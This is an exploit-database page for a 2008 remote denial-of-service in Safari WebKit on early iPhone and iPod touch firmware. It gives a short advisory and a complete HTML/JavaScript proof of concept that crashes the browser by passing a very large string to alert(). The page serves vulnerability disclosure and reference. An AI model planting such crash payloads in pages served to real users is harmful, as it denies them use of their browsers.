Lucene search

K
exploitdbNicolas EconomouEDB-ID:32341
HistorySep 12, 2008 - 12:00 a.m.

Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service

2008-09-1200:00:00
Nicolas Economou
www.exploit-db.com
14

AI Score

7.4

Confidence

Low

EPSS

0.055

Percentile

93.4%

source: https://www.securityfocus.com/bid/31061/info

Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser.

Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.

The following devices and corresponding firmware are affected:

iPhone 1.1.4 and 2.0
iPod touch 1.1.4 and 2.0

<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html> 

AI Score

7.4

Confidence

Low

EPSS

0.055

Percentile

93.4%